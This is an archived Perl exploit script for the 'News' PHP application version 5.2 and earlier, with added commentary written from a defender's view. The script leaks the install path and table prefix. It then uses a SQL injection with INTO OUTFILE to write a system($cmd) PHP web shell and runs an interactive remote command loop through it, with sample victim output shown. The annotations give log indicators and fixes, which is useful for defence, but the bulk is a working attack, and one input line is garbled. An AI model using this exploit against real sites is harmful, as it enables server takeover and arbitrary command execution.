
News <= 5.2 XSS, SQL Injection, Full Path Disclosure



#!/usr/bin/perl=0D
#=0D
#   VulnScr: News version 5.2 and prior=0D
# E-mail: contact@vincent-leclercq.com=0D 
# Web: www.vincent-leclercq.com=0D 
#=0D
#      Date: Thu June 29 12:01 2006=0D
# Credits: DarkFig (gmdarkfig@gmail.com)=0D 
#      Vuln: XSS, Full Path Disclosure, SQL Injection=0D
# Advisorie: http://www.acid-root.new.fr/advisories/news52.txt (french =))=0D 
#   Exploit: Create a php file (system($cmd)) in a dir ((smileys)chmoded 777 during the installation of the script)=0D
#=0D
#=0D
#  +-----------------------------------------+=0D
#  | News <= 5.2 SQL Injection (cmd exec) ---|=0D
#  +-----------------------------------------+=0D
#  [+]Full path: OK [/home/www/victim/news52]=0D
#  [+]Prefix: OK [news_]=0D
#  [+]File exist: OK=0D
#  [localhost]uname -a=0D
#  Linux ws6 2.6.16-SE-k8 #6 SMP PREEMPT Thu May 11 18:19:55 UTC 2006 i686 GNU/Linux=0D
#  [localhost]exit=0D
#  +-----------------------------------------+=0D
#=0D
use LWP::UserAgent;=0D
use LWP::Simple;=0D
use Getopt::Long;=0D
=0D
=0D
#=0D
# Argvs=0D
#=0D
# Start-up: print the banner, then read the target host and path from the command line.
# NOTE(review): $host and $path are never declared with `my`, and no `use strict` or
# `use warnings` is visible in this listing.
header();=0D
# Checked against raw @ARGV before GetOptions runs: a missing (or false) second
# argument prints the usage line and exits.
if(!$ARGV[1]){ &usageis; }=0D
GetOptions( 'host=s'  => \$host,=0D
            'path=s'  => \$path,=0D
           );=0D
# Keep only what follows "http://" in -host (the pattern is unanchored); the scheme
# is added back when the base URL is built.
if($host =~ /http:\/\/(.*)/){=0D
  $host = $1;=0D
}=0D
=0D
=0D
#=0D
# Vars=0D
#=0D
# Settings shared by the requests below.
# Base URL is a plain concatenation of -host and -path; neither value is validated here.
my $helurl = 'http://'.$host.$path;=0D 
# Fixed User-Agent string set on the LWP::UserAgent client. It is a searchable value in
# web-server access logs, but only for the requests made through $client; the
# LWP::Simple get() calls later in the script do not go through that client.
my $uagent = 'Perlnamigator';=0D
# Handed to the client's timeout() setter (LWP::UserAgent takes this in seconds).
my $timeut = '30';=0D
# Messages printed before the script exits on a failed step.
my $errr00 = "[-]Can't connect to the host\n";=0D
my $errr01 = "[-]Can't get the full path of the website\n";=0D
my $errr02 = "[-]Can't get the table prefix\n";=0D
my $errr03 = "[-]The php file doesn't exist\n";=0D
=0D
=0D
#=0D
# Client=0D
#=0D
# One LWP::UserAgent instance carries the custom agent string and the timeout for the
# requests issued through $client (steps one to three).
my $client = LWP::UserAgent->new();=0D
$client->agent($uagent);=0D
$client->timeout($timeut);=0D
=0D
=0D
#=0D
# First step: Determine the installation path.=0D
#=0D
# Step one (full path disclosure): POST to index.php with `mail` sent as an array
# (`mail[]`) and read the installation directory out of the error text in the response.
# Defender view: the pattern below matches "in <path>/configuration/head.php</b>", i.e. the
# application answers with an error message that names head.php by absolute path.
# Presumably this is a PHP warning shown because error display is enabled and `mail` is
# not type-checked - confirm against the advisory. Keeping error output out of HTTP
# responses removes this leak.
# NOTE(review): LWP::UserAgent->post() returns a response object even when the request
# fails, so the `or print $errr00` branch is not reached; a failed request ends up in the
# else-branch below instead.
$req1 = $client->post($helurl.'index.php', Content => ['mail[]' => 'root\@localhost.com', 'submit' => 'S%27inscrire'],) or print $errr00 and the_end();=0D 
if($req1->as_string =~ /in (.*?)\/configuration\/head.php<\/b>/) {=0D
  $fullpath = $1;=0D
  print "[+]Full path: OK [$fullpath]\n";=0D
  # From here on $fullpath is the server-side path of the file written in step three.
  $fullpath .= "/admin/smileys/hello.php";=0D
} else {=0D
  print $errr01;=0D
  the_end();=0D
}=0D
=0D
=0D
#=0D
# Second step: Determine the table prefix.=0D
#=0D
# Step two (SQL error disclosure): request divers.php with an `id` value that starts with
# an encoded single quote (%27) and read the table name from the SQL statement echoed back.
# Defender view: the response pattern indicates two weaknesses used together - `id` reaches
# the query without escaping, and the failing statement ("SELECT id FROM <table> WHERE ...")
# is returned to the client. Binding or integer-casting `id` and suppressing database error
# output address both.
# Log indicator: requests to divers.php whose `id` parameter contains %27.
$req2 = $client->get($helurl.'divers.php?action=XXX&id=%27ERROR');=0D
if($req2->as_string =~ /SELECT id FROM (.*?) WHERE/) {=0D
  # Captured text is whatever sits between FROM and WHERE; the script uses it as the
  # table name in step three.
  $prefixe = $1;=0D
  print "[+]Prefix: OK [$prefixe]\n";=0D
} else {=0D
  print $errr02;=0D
  the_end();=0D
}=0D
=0D
=0D
#=0D
# Third step: Create a php file (system($cmd))=0D
#=0D
# Step three (SQL injection used as a file write): the `id` parameter carries a URL-encoded
# UNION SELECT ... INTO OUTFILE clause, so the database server is asked to write a one-line
# PHP file to the path held in $fullpath (admin/smileys/hello.php under the install dir).
# Defender view: this step depends on the database account being allowed to write files
# and on the target directory being writable by the database server; the header of this
# listing states the smileys directory is chmod 777 after installation. Each of the
# following breaks the step: parameterising the `id` query, removing the FILE privilege
# from the application's database account (INTO OUTFILE is MySQL syntax; secure_file_priv
# restricts it further), and tightening the directory mode.
# The written PHP reads $cmd as a bare variable - presumably it depends on
# register_globals being enabled; confirm.
# Log indicator: "INTO%20OUTFILE" in the query string of a divers.php request.
# NOTE(review): get() on the client returns a response object even on failure, so the
# `or print $errr00` branch does not detect a failed request.
$inject = "%27%20UNION%20SELECT%20%27%3C?%20system(\$cmd);%20?%3E%27%20FROM%20".$prefixe."%20INTO%20OUTFILE%20%27".$fullpath."%27%23";=0D
$req3 = $client->get($helurl.'divers.php?action=XXX&id='.$inject) or print $errr00 and the_end();=0D
=0D
=0D
#=0D
# Fourth step: file_exists()? yes ! enjoy =)=0D
#=0D
# Step four: fetch the written file with LWP::Simple's get(), which returns undef on
# failure, so a false result prints $errr03 and exits. On success the interactive loop
# in commandexec starts.
# Defender view: an unexpected hello.php under admin/smileys is the on-disk artefact of
# this script. Requests from here on go through LWP::Simple rather than $client, so they
# do not carry the 'Perlnamigator' agent string.
$req4 = get($helurl.'admin/smileys/hello.php') or print $errr03 and the_end();=0D
print "[+]File exist: OK\n";=0D
&commandexec;=0D
=0D
=0D
#=0D
# Subroutines=0D
#=0D
# Interactive loop: prompt with the host name, send each entered line as the `cmd` query
# parameter of admin/smileys/hello.php and print the response body; "exit" ends the script.
# NOTE(review): the right-hand side of `$cmd = ` is missing in this archived copy (lost in
# extraction), so that line does not parse as shown.
# Defender view: every command travels in the URL, so it is recorded in the web server's
# access log as ?cmd=... on hello.php - the main forensic trail left by this tool.
sub commandexec {=0D
# `1 ne 2` is always true; the loop only ends through the_end().
while(1 ne 2) {=0D
  print "[$host]"; chomp($cmd = );=0D
  if($cmd eq "exit"){ &the_end; }=0D
  # The entered text is appended to the URL as typed, with no encoding step in between.
  $req5 = get($helurl.'admin/smileys/hello.php?cmd='.$cmd) or print $errr00 and the_end();=0D
  print $req5, "\n";=0D
}}=0D
=0D
# Print the one-line usage message, then exit through the_end().
sub usageis {=0D
  print "| Usage: -host localhost -path /news/  ---| \n";=0D
  # Called with `&` and no parentheses, which passes the caller's @_ along; the_end ignores it.
  &the_end;=0D
}=0D
=0D
# Common exit point: print the closing rule of the banner box and terminate the script.
# Every failure path and the "exit" command end here; exit is called without an explicit
# status, so failures are not distinguishable from a normal end by exit code.
sub the_end {=0D
  print "+-----------------------------------------+\n";=0D
  exit;=0D
}=0D
=0D
# Print the three-line banner shown at start-up; takes no arguments and returns
# the result of the last print.
sub header {=0D
  print "\n+-----------------------------------------+\n";=0D
  print "| News <= 5.2 SQL Injection (cmd exec) ---|\n";=0D
  print "+-----------------------------------------+\n";=0D
}
